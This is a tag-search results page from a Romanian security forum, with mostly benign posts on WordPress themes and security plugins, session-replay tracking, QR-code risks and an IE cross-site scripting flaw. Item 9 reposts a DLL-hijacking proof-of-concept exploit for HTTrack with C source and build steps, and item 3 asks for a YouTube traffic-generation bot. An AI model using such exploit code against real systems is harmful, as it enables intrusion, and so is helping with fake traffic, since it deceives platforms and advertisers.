Jump to content

Search the Community

Showing results for tags 'website'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 18 results

  1. Filip – IOS App Store v.2.0.1200 Premium Wordpress Theme for Affiliate IOS App from Itune About IOS App Store: Flip IOS App Store Premium Wordpress theme allow you build ios app store like Google Play, Itune App Store .... It is full automatic. No need maintain. Flip IOS App Store Features: Itune Affiliate Integration IOS App Store Theme integrate affiliate application of Itune. You can use your itune affiliate id in your website. If you don’t have itune affiliate, you can signup it easy. Import Genres As Category You can import genres of itune affiliate as category to your website with one click. By this way, you will save your time when create application category for your website. Easy Features Category You can manager feature category of your website, you can choose any category as feature in category option panel. Automatic Import App Application feeds will automatic import to your website. You can choose your location, import cycle, feed type, … and how many items will import to your website. If you don’t want automatic import, you can turn it off. Target Import App You can import ios application to your website from your keyword. Just enter keyword, search and publish it. Mobile Ready Our themes support all morden device includes: iphone, ipad, android, … your visitor can use any device to visitor to your website. Custom Background You can change background of header, footer, or website background. With our themes, you change it very easy in Theme Option Panel. You can upload a images, change color, … Unlimit Sidebars With our themes. you to create an unlimited number of sidebars from the Sidebar Control Panel. It allows you to assign a custom sidebar to every single page, archive or index. And you can always use the default ones as well Compatible with all browsers. Our themes are compatible with the most popular internet browsers. It’s important that your website performs well for everyone that visits it. Themed Login & Signup Pages We don’t use default login page and register page of wordpress. Our themes have a separate login page and register page. It makes your website more friendly and easier to use. Google Analytics Google analytics or other tracking code can easy put to your website in theme option panel. Tracking Code With our themes have panel option help you add tracking code for each page, post in your website. It helps you easily manage visitors to your website. And find better marketing solution for your websites. Easy change layout By default, we are intergate best layout for your website. However, you can change layout of your website in theme option panel with one click. Search Engine Optimized With our themes, You will don’t need install plugins. SEO is include in our themes. You can easy add meta tags, keywords, … for each page. or It will auto generate for your post, page and other page. Ease change Logo, favicon You can easy upload favicon, logo. Change logo position on your website … Auto-Updates Our themes will auto check new version and update for your website. New version will notify in admin control panel or email to your email. You can choose install automatic mode or manual mode. Easy Description By default, wordpress will use top of content in your post, or page or post expert(if theme support it). But, with our themes, you can custom description fo your post, page. You can choose any content you like. Page Options Different with others themes, you can choose to hide or display the title, author, categories, tags, … of each page, post, … You can do it very easy in Post Panel. Easy Sidebar Control With our themes, you can control layout of each sidebar. You can select layout for sidebar, turn on or off it. … Unlimited Font Our themes includes support all Google fonts, you can use any font of Google Font you like. If you don’t want use google fonts. You can upload your own font to your website. It is very easy to do in Font Panel. HTML5 / CSS3 We believe modern WordPress themes should be using modern technologies. Every theme in our catalogue is based on HTML5 / CSS3 (progressively). DEMO: Top App for iPhone, IPad - IOS App Store - Top App for iPhone, IPad - IOS App Store Theme Page: Filip - IOS App Store - SuuPress.com Download: iosappstore-full.zip - Google Drive
  2. How many times it has happened to you when you look for something online and the next moment you find its advertisement on almost every other web page or social media site you visit? Web-tracking is not new. Most of the websites log its users' online activities, but a recent study from Princeton University has suggested that hundreds of sites record your every move online, including your searches, scrolling behavior, keystrokes and every movement. Researchers from Princeton University's Centre for Information Technology Policy (CITP) analyzed the Alexa top 50,000 websites in the world and found that 482 sites, many of which are high profile, are using a new web-tracking technique to track every move of their users. Dubbed "Session Replay," the technique is used even by most popular websites, including The Guardian, Reuters, Samsung, Al-Jazeera, VK, Adobe, Microsoft, and WordPress, to record every single movement a visitor does while navigating a web page, and this incredibly extensive data is then sent off to a third party for analysis. "Session replay scripts" are usually designed to gather data regarding user engagement that can be used by website developers to improve the end-user experience. However, what's particularly concerning is that these scripts record beyond the information you purposely give to a website—which also includes the text you type out while filing a form and then delete before hitting 'Submit.' Most troubling part is that the information collected by session replay scripts cannot "reasonably be expected to be kept anonymous." Some of the companies that provide session replay software even allow website owners to explicitly link recordings to a user's real identity. Services Offering Session Replay Could Capture Your Passwords The researchers looked at some of the leading companies, including FullStory, SessionCam, Clicktale, Smartlook, UserReplay, Hotjar, and Yandex, which offer session replay software services, and found that most of these services directly exclude password input fields from recording. However, most of the times mobile-friendly login forms that use text inputs to store unmasked passwords are not redacted on the recordings, which ends up revealing your sensitive data, including passwords, credit card numbers, and even credit card security codes. This data is then shared with a third party for analysis, along with other gathered information. The researchers also shared a video which shows how much detail these session recording scripts can collect on a website's visitor. World's Top Websites Record Your Every Keystroke There are a lot of significant firms using session replay scripts even with the best of intentions, but since this data is being collected without the user's knowledge or visual indication to the user, these websites are just downplaying users' privacy. Also, there is always potential for such data to fall into the wrong hands. Besides the fact that this practice is happening without people's knowledge, the people in charge of some of the websites also did not even know that the script was implemented, which makes the matter a little scary. Companies using such software included The Guardian, Reuters, Samsung, Al-Jazeera, VK, Adobe, Microsoft, WordPress, Samsung, CBS News, the Telegraph, Reuters, and US retail giant Home Depot, among many others. So, if you are logging in one of these websites, you should expect that everything you write, type, or move is being recorded. Via thehackernews.com
  3. Salutare Sunt interesat si eu de un bot sau o sursa pentru generare de trafic safe catre youtube. Nu ma intereseaza sa trimit direct 100k traffic intr-o zi dar 1500 imi ajunge . Poate stiti un bot ok care sa poata face asta , am incercat mai de mult cu chingling sau cum ii zice dar am inteles ca acuma cam da rateuri si ma intereseaza in special ca traficul sa nu vina din china. Poate aveti cunostinte despre asa ceva si imi puteti da cateva sfaturi. Multumesc anticipat !
  4. Hi all, there is a website that I found where you can practice your website hacking skills. There are 50 vulnerabilities to be found, this website goes along with the courses from my previous course where I provide a URL with a plethora of courses The URL of this website: http://hackyourselffirst.troyhunt.com/ Good luck.
  5. Buna ziua , am nevoie de un site de asigurari ca acesta : http://www.icukinsurance.co.uk/ cu tot ce implica categoriile de pe acel site! Iar ca tema pentru el ar fi asta: https://www.directline.com/ sau ceva mai modern!! Categoriile de pe http://icukinsurance.co.uk au fiecare un quote de care am nevoie si datele trimise de client sa fie stocate intr-o baza de date si in acelasi timp sa fie trimise si pe mail dupa ce clientul termina de complectat! Cam asta este in mare parte de ce am nevoie in mare parte! Cat m-ar costa un astfel de site! Nu vreau cu login, sau alte aiureli, sa fie cat mai simplu si modern! Multumesc mult!!
  6. Prestez servicii de web design & developing de înalt? clas? la pre?uri accesibile. Pentru mai multe informa?ii, trimite?i un mesaj privat. Limbajele pe care le am la dispozi?ie pentru tine sunt: PHP, MySQL(PDO), Javascript (?i libr?rii precum jQuery & Ajax), HTML & CSS. De-asemenea pot coda layout-uri din PSD în HTML & CSS. Ultimul proiect: Steamvendor.com - Buy premium keys Pentru toate celelalte proiecte pute?i accesa: ENE ADRIAN / Professional web development Any feedback is welcome Thanks, EAdrian
  7. The Useless Web si cel mai tare prins de mine The finger, deal with it. )))))))))))))))))))
  8. With the increasing use of smartphones, QR codes are becoming popular. Recently, WhatsApp launched its web version, which needs QR code scanning to access the web version of WhatsApp. So, many people now know what QR code is, but still more are unaware. It is very similar to a bar code we see in products, but it does not need a different reader. Our smartphone camera can easily read it with the help of a QR code scanner app. Due to fast readability, it is now widely accepted. And the use of QR codes is increasing. With the scan of a QR code, we can perform various tasks which would otherwise need a lot more effort. For example, scan a QR code and save the business card details in your smartphone. This is why people like to use QR code scanning for general tasks. But most users are not aware that QR codes can also be malicious. This is why scammers are now using malicious QR codes for tricking users. In this article, I will discuss QR codes in details. I will also try to cover all the potential security issues related to QR codes. QR Codes QR code (or Quick Response code) is a matrix bar code which can be read by an imaging device (camera) and then processed to read its data. It was initially developed for the automotive industry in Japan, but now it is being used by many companies. You will be surprised to know that the QR code was invented back in 1994 by Denso Wave. Nowadays QR codes are being used to display text to users, to save a vCard contact information to the user’s smartphone, to open a website URL, to code payments, for website login (ex: WhatsApp web login) or to compose an e-mail or text message just by scanning a QR code. QR codes are really useful and help us to complete tasks faster in smartphones. You can quickly open a website just by scanning a QR code and you do not need to manually type the URL in your smartphone. This is why many websites’ poster ads now contain QR code. Another popular use is on a business card. Now people also include QR code in their business cards. So, other persons can simply scan the QR code to save the contact details in their smartphone. See the sample QR code below. This is for opening a website. QR code for: IT Security Training & Resources by InfoSec Institute Scanning the above QR code will open IT Security Training & Resources by InfoSec Institute. How to Generate QR Codes There are various tools available for this. If you want to generate a QR code with specific information, you can use these tools, which let you create QR code for URL, text, vCard, SMS, call, geo-location, event, email and login. Different tools have different abilities. A few good QR code generator tools are: https://www.the-qrcode-generator.com/ QR Code Generator – create QR codes for free (Logo, T-Shirt, vCard, EPS) QR Code Generator - Create QR codes here http://www.qrstuff.com/ https://scan.me/qr-code-generator You can use any of the above tools to generate your own QR code. Lifespan of QR codes This is a question about QR code people generally ask. QR code does not need any platform for redirection, but it has data within it. Once a QR code is generated, it can be used anytime, anywhere. The lifespan of the QR codes is unlimited, so you do not need to worry about lifespan. Generate and then use. Can QR codes be hacked? A QR code is the square matrix with small black square dots arrangement. Hacking a QR code means manipulation of the action without modifying the QR code. This is not possible. QR codes can be malicious and can trigger malicious action. But that QR code will not be the same as the legitimate QR code. Two QR codes with different actions will never be the same. You will certainly see different patterns in both QR codes. So, QR codes cannot be hacked. But It can be malicious and hackers can use a QR code for various malicious purposes. And there are various reports in which we have seen the malicious acts. Security Risks Involved with Use of QR Codes As I already discussed, QR codes can be malicious. So, there are various security risks involved with QR codes. In this section, I will discuss all the security risks involved with QR codes. Phishing Phishing is a popular way of hacking web accounts. Attackers send a fake web login page which pretends to be the original login page of the website it’s claiming to be. When an innocent user use this fake page to login, his/her login information is sent to the attacker. And now, his/her password is in the hands of the attacker. Phishing is the main security issue involved with QR codes. It is also described as QRishing by some security researchers. QR codes are generally scanned by a smartphone camera to visit a website. Now, many website ads put QR code along with a URL so users can quickly scan QR code to visit the website. This is where scammers try to trick users. As I already told you, QR codes cannot be hacked. So, hackers or scammers try to change the QR code added in the poster. They can also print the similar kind of fake posters and put in public places. Innocent customers will scan these fake QR codes to visit the websites but they will be redirected to phishing websites. Most people judge a website by its look and feel, and phishing pages look exactly similar to legitimate websites. In mobile devices, it is hard to check the full address in the browsers. Due to limited space, browsers do not show the full address in the URL field. And most people never try to check the full address. This makes users more vulnerable. When they use this phishing page to login, their passwords are compromised. Although this phishing trick has limited scope, it is most effective. There are various case studies which clearly confirm that people generally trust QR codes and become the victim of QRishing at public places. Malicious software distribution Scammers generally use malicious websites to distribute malware via drive by download attack. Nowadays, most of the drive by download attacks are being done against Android users. Drive by download attacks are attacks in which a website forcefully downloads software in your device when you visit the website. It does not need any action from the user’s side. Visiting the website is enough to trigger the download action. Scammers try to install malicious apps and then exploit that device. These infected devices can join an existing botnet or can send SMS to premium numbers. It can also leak your data. By using QR codes to point to this kind of malicious websites, we can easily trick users. Users cannot see the URL, so there is no point of doubt. In QR codes, there is no need to enter the URL manually, users only scan QR code. And they only know what you will write about the QR code. In Russia, a malicious QR code on scanning sent SMS to premium numbers costing $5 USD per SMS. Most of these kinds of attacks have been seen against Android devices. Pointing to potentially harmful websites This is similar to what we learned in the previous point, but it is not about serving malware. Sometimes websites have browser exploits which can do lot more harm. Browser exploits can enable microphone/camera access, access browser data, send emails or join a botnet to perform a DDOS attack on any legit website. All these actions occur in the background, so users never know about this. They will only see a website, but they are being tricked. How to Protect Yourself from Malicious QR Codes Malicious QR codes have limited scope, but may be harmful. So, you need to be protective and always take care of your security while using QR codes. If you are going to use it from banners at public places, you need to be selective. There are few things which you can do to protect yourself from malicious QR codes and its attacks. Observe before use: If you find a QR code in any banner advertisement in a public place, look at it closely. Most of the times, scammers stick their fake QR code above the legitimate QR code in a legitimate poster. So try to see if it is real or not. You can check by touching the poster. If it does not look like it’s actually printed on the poster, do not use it. Follow this guideline for QR codes in public places. Your observation can save you from attacks. If you are not sure, never scan that QR code. Be suspicious and never giver personal or login info: Always be suspicious of the page you land on via QR code. Never share your personal information on these pages. Only do this if the QR code is from a very trusted source and you trust the website. And yes, avoid entering your login information. It may be a phishing page. So for login, always enter the URL manually on the browser’s address bar. Entering login information on the pages you land on via QR code means putting yourself in big trouble. So, why take the risk just to avoid a little extra effort? Open a browser, type the address and login directly on the website. Look at URL before proceeding: A few QR code scanners also show the actual URL before proceeding and ask to confirm whether you want to visit the URL. You can use these QR code scanners to know what URL the QR code will send you. This will help you to know if the QR code is malicious or not. Looking at the QR code does not confirm whether it is malicious or not. So, I recommend use of safe QR code scanners. Norton Snap is a nice QR code scanner app with built-in security features. This app is available for both Android and iOS platforms. You can use this QR code scanner app to prevent any malicious activity in your smartphone. It not only shows the URLs but also checks the URLs within its database of malicious links. If it finds any malicious URLs within the QR code, it will warn you. Conclusion Although QR codes are not new, their use is still very limited. With the increasing use of smartphones, we have seen sudden a rise in the use of QR codes. Now various websites and apps let users use a QR code to login or complete other tasks. But there are still very few users who use QR codes. This is the reason why there is little reporting on malicious QR codes. Nobody wants to waste time on things which have low impact. But this will change very soon. With the launch of WhatsApp for web, now many users know how to use QR codes. So, we can expect another sudden rise in the use of QR codes. And when it is used by a greater number of users, attackers will surely find new ways to exploit its weaknesses. As of now, QR code risks have limited scope, but when there are more users, there will surely become a bigger risk. In the near future, we will also see the use of QR codes for payments and money transfer. At that time, it will be very important to follow security rules. As of now, we only need to use a good and secure QR code scanner app and then relax. Having a good anti-virus and Internet security app is also recommended. This will warn if a website is a phishing website or trying to install a dangerous app in your smartphone. I hope you have found this article interesting. If you use QR code, do not forget to be safe. References http://usa.kaspersky.com/about-us/press-center/press-blog/malicious-qr-codes-attack-methods-techniques-infographic https://www.andrew.cmu.edu/user/nicolasc/publications/Vidas-USEC13.pdf http://en.wikipedia.org/wiki/QR_code Source
  9. #[+] Author: TUNISIAN CYBER #[+] Exploit Title: HTTrack Website Copier v3.48-21 DLL Hijacking #[+] Date: 28-03-2015 #[+] Type: Local Exploits #[+] Vendor: https://httrack.com/page/2/fr/index.html #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Create Compile the file then rename it to dwmapi.dll then create .whtt file , make sure that # the 2 files are in the same dir. #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } Source: http://dl.packetstormsecurity.net/1503-exploits/httrackwebsitecopier-dllhijack.txt Edit: Cer ca postul s? fie ?ters , originally posted by Aerosol: https://rstforums.com/forum/99633-httrack-website-copier-3-48-21-dll-hijacking.rst
  10. Programming Languages - Hyperpolyglot Poate ajuta multi invidizi de p'aici care fac N thread-uri: "cu ce sa incep, teach me ,etc"
  11. Beginning with April 21 2015, the biggest search company Google will use the mobile friendly websites in the ranking algorithm, which mean that if your website is mobile friendly,it will rank higher then the other websites. Surce: Goodweb
  12. WordPress is the most popular CMS (Content Management System) available nowadays online, used by the vast majority of all sites. If you have a look at this report, WordPress holds the lion share (60.6%) of the sites whose CMS we know and a total of 23.4% of all sites. It is easy to use and it offers great flexibility, with both ready and custom templates and a plethora of plugins to put into effect. Moreover, WordPress provides its users with the opportunity to enhance the SEO-friendly (and thus Google-friendly) nature of their site pretty smoothly and it also offers mobile-friendly themes. These are some of the major reasons why WordPress has been characterized as one of the most successful CMS options to date, and this is why it is the number one choice for many web designers, developers, tech freaks and even novices and tech-illiterate people who seek to find a simple yet effective tool for creating their site. Due to its exponential growth and its universal popularity, WordPress is not immune to threats and hacking attempts. It is true that the more popular something is, the more likely it will be for others to seek compromising it in the long run. This is why it is not that rare a phenomenon to hear about WordPress sites having been hacked and not being able to function properly. Before we continue with our guide about cleaning up WordPress, it is important that we truly understand what website hacking is and what this can do to your site and your computer. What Website Hacking is, and How it Affects You There are two major types of website hacking that you should beware of, in order to ensure that you offer the best user experience to every single visitor and not compromise his or her overall security: The first type has to do with the establishment of a backdoor; this means that the hacker leaves room for returning to your site whenever he feels like it and gaining access to places that should be out of reach for him. The difficulty in tracing this type of website hacking lies in the fact that this backdoor is not visible to the naked eye – and thus it can go unnoticed for a truly long time. The second type involves the deterioration of user experience and the compromise of your site directly from the source. The visitors that click on your site can be redirected to other sites or get pop-ups on their screen as soon as they head to your home page. In addition, malware can be installed silently to the computers of your site’s visitors, and of course this is never a good thing. Now that we have comprehended what goes on in cases of WordPress sites being hacked, and before moving on to the process of WordPress database cleanup, it is time to highlight the signs that should alarm you that something is wrong with your site. Signs that Reveal a Potential WordPress Hack Even though the signs are not a perfect match to every single WordPress site that has been compromised, they offer some truly helpful information that should get you on your feet and urge you to dig deeper and see whether or not your site has indeed been hacked. Let’s see these signs in the form of bullets: Problems with e-mails: The hackers will start sending e-mails from your site, and you will most probably be blocked as spam mailer. This can affect your communication with others, as you will not even have a clue about your e-mail activity. Bad content added to WP: You cannot control what content is added to your site, and this is in fact one of the major factors that ought to urge you to start cleaning up the mess. Slow performance or crash: This is another indicator that you are in need of WordPress clean up after a hack. If you are experiencing too slow performance or if you see that your site has crashed, you should look no further. Traffic drops significantly: You will most likely observe that you get no traffic at all or you have lost most of your visitors from one day to the next. Unless you have dealt with a matter of bad reputation recently, this should alarm you. Website disappears: This is the most shocking sign that your site has been under attack. In some cases, the hackers remove everything from the site and thus take it down. As soon as you have noticed some of these signs, it is high time to take matters into your own hands. Though this process is neither easy nor simple to complete, you can in fact repair your WordPress site and make sure that you shield it against any future acts of this sort. How to Repair Your Hacked WordPress Site From the very moment when you determine that your WordPress site has been hacked, you need to take some immediate actions and start working toward cleaning everything up and securing your digital premises. Let’s have a look at what it takes for you to accomplish that: Restore Your Site via Upgrade and Reinstallation: Make use of your backup and restore your site, so that it can keep running. Upon doing so, you need to be thorough while reinstalling all the plugins and additional tools that you have been using so far. It is important to reinstall them and then upgrade them to the latest version. Scan and Cleanup Your Machine: If you had not installed an anti-virus program, please DO! This is essential, in order to highlight any red flags for you to consider. Scan the machine of yours in detail and fix any problems that emerge. Change All the Passwords: Do not be sloppy when it comes to cleaning up WordPress. On the contrary, you ought to be really scholastic and change all the passwords that you have been using in e-mail accounts, financial transactions and anywhere else. Of course, it goes without even saying that you need to change the WP administrator password and get a new one (rather than the default that many users don’t mind keeping). Back up Everything: Besides being able to restore your site in the event of hacking or crashing, you can compare the backups with your current WP site and check for any alterations whatsoever. Check wp-config.php File: If you come across any modifications when comparing your file with the wp-config-sample.php file, you had better change them. Engage in Premium Security Solutions: Although it can be tempting to handle your WordPress site and its maintenance on your own or make use of your son’s talent or the wit of your best friend, such options generally come with a greater percentage of risk. Instead, consider premium security solutions that will safeguard your site and deal with the proper WordPress maintenance required. Any Uploaded File Should Be Copied: This will allow you to keep everything under control. Even in the discomforting event of a crash or any other problem getting in the way, you will know that you have got copies to turn to. Fresh, New Version of WordPress: Do not settle for older versions of WordPress. Instead, be sure to get updates and have the latest version of WordPress that has fixed security issues and can keep you thoroughly protected. Go through Every Post: This can take some time, but it is worth the trouble. You should go through every post of yours and identify any problem, in order to deal with it effectively. How to Protect Your Site from Any Future Attack As hacking is not a one-time deal, you will have to comply with some security precautions that help you maintain everything perfectly secured on your WordPress site. Below, there are some pieces of advice that you ought to consider for protecting your WordPress website from any malicious intent: Restrict Administrative Privileges: The fewer the people who access your admin panel, the less likely it will be for breaches to occur. Scan on a Daily Basis: If you are vigilant and you do not neglect scanning your site daily for bugs and other vulnerabilities, the hack is less likely to succeed. Use Secured Protocols: Instead of connecting with the use of FTP, you can go for SFTP or SSH for ensuring that it is infinitely more difficult for somebody to track you down. Use 2-Verification: Make sure that you enhance your site’s security using 2-step verification. This will result in the hacker requiring much bigger effort towards accessing your site. Disable PHP Execution: You can find detailed instructions on how you can do that, since it will certainly help you out eliminate threats in the future. From everything that has been analyzed in this article on cleaning up WordPress, this is a tough job – however, it is not impossible to complete and what you gain is truly remarkable; a fully protected WordPress site that does not compromise anything in terms of security and performance! Source
  13. WordPress is the most popular blogging platform in the world. Millions of websites including various popular blogs are using WordPress as a content publishing platform. So, hackers are also more interested in hacking WordPress based websites. WordPress usually pushes updates to patch all the known vulnerabilities, but third party themes and plugins make WordPress vulnerable. Sometimes hackers also find vulnerabilities in WordPress that allow them to hack the whole server. In the past three months, we have seen 2 major zero-day vulnerabilities and mass hacking of WordPress websites. Thousands of websites were hacked by exploiting these vulnerabilities. There are many past examples in which a single vulnerable plugin led to the hacking of whole web server hosting hundreds of websites. A few days back, we discussed SoakSoak malware which affected 100k websites in very little time by exploiting the vulnerability in a plugin. So, if you are a WordPress user, you must take care of security. You must always keep your WordPress installation updated and secure. In a previous post, I also discussed WPScanner, a tool for scanning a WordPress website and finding vulnerabilities in it. If you are WordPress user, you can use this tool to find vulnerabilities in your website and patch. In this post, I will discuss various security plugins available for WordPress. These security plugins offer a wide range of features to make your WordPress blog secure from known threats. These plugins keep their services updated with security from the latest exploits and threats. If you are really serious about your online business running on WordPress, you must use any of these plugins to make it secure. These are the 7 best security plugins available for WordPress. 1. WordFence WordFence is one of the most popular WordPress security plugins. It keeps on checking your website for malware infection. If scans all the files of your WordPress core, theme and plugins. If it finds any kind of infection, it will notify you. It claims to make your WordPress website 50 times faster and secure. For making your website faster, it uses Falcom caching engine. This plugin is free, but a few advanced features are available for premium users. If you can afford it, do it. This plugin blocks bruteforce attack and can add two factor authentication via SMS. You can also block traffic from a specific country. It also includes a firewall to block fake traffic, botnet and scanners. It also scans your hosting for known backdoors including C99, R57 and others. If it finds anything, you will instantly get email notification. It also scans your posts and comments for malicious code. It also supports multi-site. You can also check the traffic on your WordPress website in real time and see if there is any security threat attacking your website. Download WordFence 2. BulletProof Security BulletProof Security is another popular WordPress security plugin that takes care of various things. It adds firewall security, database security, login security and more. It comes with four-click setup interface. Just activate this plugin and then relax. It will take care of your website. It limits failed login attempts and blocks security scanners, fake traffic, IP blocking and code scanners. It keeps on checking the code of WordPress core files, themes and plugins. In case of any known infection, it notifies admin. It also optimizes the performance of your website by adding caching. It comes with built-in file manager for htaccess. It protects WordPress websites against various vulnerabilities including XSS, RFI, CRLF, CSRF, Base64, Code Injection, SQL Injection and many other. This plugin keeps itself updated with new vulnerabilities to keep your website protected. It keeps on updating it according to new exploits and vulnerabilities. It also has a pro version which offers some advanced features to improve the security of your website. But the free version is popular enough to make your website secure. Download BulletProof Security 3. Sucuri Security Sucuri Security is the security plugin for WordPress. This plugin is from the popular website security and auditing company Sucuri. This plugin offers various security features like security activity auditing, file integrity monitoring, malware scanning, blacklist monitoring, and website firewall. It incorporates various blacklist engines including Google Safe Browsing, Sucuri Labs, Norton, McAfee Site Advisor and more to check your website. If there is anything wrong, it will notify you via email. It protects your website from DOS attack, Zero Day Disclosure Patches, bruteforce attacks and other scanner attacks. It also keeps log of all activities and keep these logs safe in the Sucuri cloud. So, if an attacker is able to bypass the security controls, your security logs will be safe within Sucuri’s security operations center. If you are willing to pay, you can go for the Sucuri premium service. They are a well known web application security company with a team of experts. So, you can get better service and advice. Download Sucuri Security 4. iThemes Security (formerly Better WP Security) iThemes Security is also a nice WordPress security plugin which claims to offer 30+ ways to secure and protect your WordPress website. With one click installation, you can stop automated attacks and protect your website. it also fixes various common security holes in your website. It tracks registered users’ activity and adds two-factor authentication, import/export settings, password expiration, malware scanning, and various other things. It scans the entire website and tries to find if there is any potential vulnerability in your website. It also prevents bruteforce attacks and ban IP addresses which try to bruteforce. It also forces users to use secure passwords and also forces SSL for admin area in server support. Unlike other plugins, the GeoIP banning feature is not available. But the company has promised to bring this feature soon. We cannot say exactly when, but it says the feature is coming soon. It also integrates Google reCAPTCHA to prevent comment spam on your website. Download iThemes security 5. Acunetix WP SecurityScan Acunetix WP Security Scan is the WordPress security plugin by Acunetix. Acunetix is a well known company in web application security. It offers a security scanning tool to find vulnerabilities in web applications. This plugin helps you to secure your WordPress website and suggests measures to improve the security. It offers file permission security, version hiding, admin protection, removing WP generator tag from source, and database security. It removes various information from the source code of the page which can be used in the information gathering process before attack. This includes theme update information, plugin update information, really simple discover meta tag, WordPress version, Windows live write meta tag, error information from login page, versions from scripts, versions from stylesheets, database and php error reporting. It also offers a database backup tool to take a backup of your website. With its live traffic monitor tool, you can check traffic in real time. It also scans your website to notify known web application vulnerabilities. Download Acunetix WP SecurityScan 6. All In One WP Security & Firewall All In One WP Security & Firewall is another popular WordPress security plugin to check vulnerabilities in your WordPress website. This plugin is easy to use and reduces the security risks by adding recommended security practices. It protect against bruteforce login attack and lockdown if someone tries to bruteforce. It also sends you an email notification if somebody gets locked out due to failed login attempts. It detects if a user tries to save a weak password and forces him/her to use a strong password. It also monitors the account activity of all users and keeps track of username, IP and login date time. It also allows you to schedule automatic backup and receive email notification. It also protects PHP code by disabling admin area editing. It adds a web application firewall in your website and enables 5G Blacklist to prevent various attacks. It denies bad query strings, prevent XSS, CSRF, SQL injection, malicious bots and other security threats. It also has a security scanner which keeps track of files and notifies you about each changes in your WordPress system. It can also detect malicious code in your WordPress website. It blocks and protects your blog from comment spam. It also works with most plugins without any problem. Download All In One WP Security & Firewall 7. 6Scan Security 6Scan Security is a popular auto-fix protection for your WordPress site. It can protect your website from hackers. It offers rule-based protection for your website and tries to keep the security of your website up to date. It has a security scanner which scans and protect your website against SQL injection, Cross Site Scripting, CSRF, Directory traversal, Remote file including, DOS attack and other OWASP top ten security vulnerabilities. A notable feature of the plugin is its automatic vulnerability fix. When it finds any vulnerable code, it applies auto-fix by using its auto-fix server-side agent solution. It also has an automatic malware fix for malware related issues on your website. Like other plugins, it also sends email notifications if there is anything serious in your website. Download 6 Scan Security Additional security measures Along with these WordPress plugins, you should also follow a few security measures from your side. These will help you in improving the security of your blog. Always keep your WordPress installation up to date. Update your WordPress as soon as possible if there is any new WordPress update. Most of the times, hacked websites are those which are using an older version of WordPress. Older versions of WordPress always have a few known security issues. And exploits for these security issues are available for free. Even a kid can hack your website if it is running on a vulnerable version of WordPress. Always keep plugins and themes added in your blog updates to latest version. New versions always come with new features and security fixes. So, updating plugins and themes is necessary. Most of the time, these third party plugins and themes are the reason for vulnerability in WordPress websites. Attackers can exploit these plugins to gain access to your website or inject malicious script in your website. Download themes and plugins only from trusted sources. Nulled themes and themes from untrusted sources generally contain malware in the code. If you install any security plugin, you will be notified, but why to take risk. Avoid any unknown source for download plugins and themes. Avoid using the administrator username ‘admin’, because this is default and common. By using this username in your blog, you are making the attacker’s work easier. He does not need to guess the username now, just bruteforce your website for username admin. Thanks to these plugins, bruteforce will not work anymore. Always use strong password for your WordPress account. WordPress bruteforcing tools are available. So, do not take the risk. Use a long password with capital letters, small case letters, numbers and special characters. A combination of these makes a strong password which is hard to guess. Conclusion These are few WordPress security plugins you can use to make your WordPress blog secure. You do not need to download all these plugins. Just try any one and see if it suits you. If you are not happy with its performance, you can download any other plugin to check and use. Every single plugin offers unique security features. You will feel relaxed after having any of these plugins in your website. Malware scanning, exploit scanning and brute force protection are few features which you must have in your website. If you have a good budget and do not want to be in technicalities, you can go for premium versions of the plugins which offer more advanced security features with detail reports. A few plugins also offer free customer support and security assessment with the pro version. With an increasing number of hacking attacks, it is necessary to have security in your website. If you are a WordPress user, what security plugin do you use in your website? Share it with us in the comments. Source
  14. A researcher has identified a serious universal cross-site scripting (UXSS) vulnerability in the latest version of Microsoft’s Internet Explorer web browser. The issue was discovered by David Leo, a researcher at the UK-based security firm Deusen. The vulnerability can be leveraged to completely bypass Same Origin Policy (SOP), the policy that prevents scripts loaded from one origin from interacting with a resource from another origin. The bug allows an attacker to “steal anything from another domain, and inject anything into another domain,” the expert said in a post on Full Disclosure. A proof-of-concept (PoC) exploit for the vulnerability, tested on Internet Explorer 11 running on Windows 7, was published by Leo over the weekend. The PoC shows how an external domain can alter the content of a website. In the demonstration, the text “Hacked by Deusen” is injected into the website of The Daily Mail. The URL in the browser’s address bar remains the same -- in this case dailymail.co.uk -- even after the arbitrary content is injected, which makes this vulnerabilty ideal for phishing attacks. Joey Fowler, a senior security engineer at Tumblr, said the exploit has some “quirks,” but it works as long as the targeted website doesn’t have X-Frame-Options headers with “deny” or “same-origin” values. “Pending the payload being injected, most Content Security Policies are also bypassed (by injecting HTML instead of JavaScript, that is),” Fowler said in a reply to Leo’s Full Disclosure post. “It looks like, through this method, all viable XSS tactics are open!” Fowler has also highlighted the fact that the exploit can even bypass standard HTTP-to-HTTPS restrictions. The issue was reported to Microsoft on October 13, 2014. The company says it’s working on fixing the vulnerability, but has pointed out that an attacker needs to trick potential victims into visiting a malicious website for the exploit to work. “To successfully exploit this issue, an adversary would first need to lure a person, often through trickery such as phishing, to a malicious website that they’ve created. SmartScreen, which is on by default in newer versions of Internet Explorer, helps protect against nefarious phishing websites,” a Microsoft spokesperson told SecurityWeek. “We’re not aware of this vulnerability being actively exploited and are working to address it with an update. We continue to encourage customers to avoid opening links from untrusted sources and visiting untrusted sites, and to log out when leaving sites to help protect their information.” This isn’t the first time a vulnerability affecting Microsoft products is disclosed before the company manages to release a patch. Over the past weeks, Google’s Project Zero published the details of three Windows 